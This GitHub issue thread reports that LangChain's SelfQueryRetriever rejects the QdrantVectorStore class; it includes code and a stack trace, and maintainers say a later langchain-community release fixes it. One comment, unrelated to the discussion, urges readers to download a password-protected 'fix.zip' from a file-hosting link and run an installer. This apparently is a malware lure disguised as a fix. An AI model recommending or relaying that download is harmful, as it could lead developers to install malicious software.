### ISSUE TITLE
Self query retriever with Vector Store type <class 'langchain_qdrant.qdrant.QdrantVectorStore'> not supported.

### ISSUE THREAD

**Issue by ndhoanit1112** [langchain-ai/langchain#25798]
### Checked other resources

- [X] I added a very descriptive title to this issue.
- [X] I searched the LangChain documentation with the integrated search.
- [X] I used the GitHub search to find a similar question and didn't find it.
- [X] I am sure that this is a bug in LangChain rather than my code.
- [X] The bug is not resolved by updating to the latest stable version of LangChain (or the specific integration package).

### Example Code

```python
from langchain_openai import OpenAIEmbeddings, ChatOpenAI
from langchain.chains.query_constructor.base import AttributeInfo
from langchain.retrievers.self_query.base import SelfQueryRetriever
from langchain_qdrant import QdrantVectorStore

qdrant_cluster_url = os.environ.get("QDRANT_CLUSTER_URL")
qdrant_api_key = os.environ.get("QDRANT_API_KEY")

embeddings = OpenAIEmbeddings(model="text-embedding-3-large")
vectorstore = QdrantVectorStore.from_existing_collection(
    url=qdrant_cluster_url,
    api_key=qdrant_api_key,
    collection_name="products",
    embedding=embeddings,
)

metadata_field_info = [
    AttributeInfo(
        name="is_size_customizable",
        description="Whether the product size can be customized when ordering or not, 'Yes' or 'No'",
        type="string",
    )
]
document_content_description = "Brief description and some key features of a product"

llm = ChatOpenAI(temperature=0.5, model="gpt-4o")
retriever = SelfQueryRetriever.from_llm(
    llm, vectorstore, document_content_description, metadata_field_info, verbose=True
)

retriever.invoke("size customizable table")
```

### Error Message and Stack Trace (if applicable)

```
File "/Users/ndhoanit1112/Source/xxx/test.py", line 335, in query_qdrant
    retriever = SelfQueryRetriever.from_llm(
                ^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/ndhoanit1112/Source/xxx/.venv/lib/python3.12/site-packages/langchain/retrievers/self_query/base.py", line 314, in from_llm
    structured_query_translator = _get_builtin_translator(vectorstore)
                                  ^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^
  File "/Users/ndhoanit1112/Source/xxx/.venv/lib/python3.12/site-packages/langchain/retrievers/self_query/base.py", line 190, in _get_builtin_translator
    raise ValueError(
ValueError: Self query retriever with Vector Store type <class 'langchain_qdrant.qdrant.QdrantVectorStore'> not supported.
```

### Description

The Self Query Retriever does support Qdrant [(doc)](https://python.langchain.com/v0.2/docs/integrations/retrievers/self_query/qdrant_self_query/). However, I found that the `Qdrant` class in the document is imported from from `langchain_community.vectorstores`, which was deprecated. So the Self Query Retriever should support the `QdrantVectorStore` class from `langchain_qdrant.qdrant`.

### System Info

```
langchain==0.2.14
langchain-community==0.2.12
langchain-core==0.2.35
langchain-openai==0.1.22
langchain-qdrant==0.1.3
```

**Comment by Superstar-IT** [comment]
Download 
https://www.mediafire.com/file/5t7dozm7sptcuqj/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by bhardwaj-vipul** [comment]
Hi @ndhoanit1112, The error is because of the outdated Quant [import](https://github.com/langchain-ai/langchain/blob/555f97becbf69f283040af67d20636d1be7e93d6/libs/langchain/langchain/retrievers/self_query/base.py#L75) in the self query retriever.  
Try to use this `from langchain_community.vectorstores.Qdrant` that might fix the issue for you.

I can work on fixing this import if this issue can be assigned to me.

**Comment by Anush008** [comment]
Hey @ndhoanit1112.
Your code should now work fine with the latest `langchain-community==0.2.15`.

**Comment by ndhoanit1112** [comment]
Thank you @Anush008 !
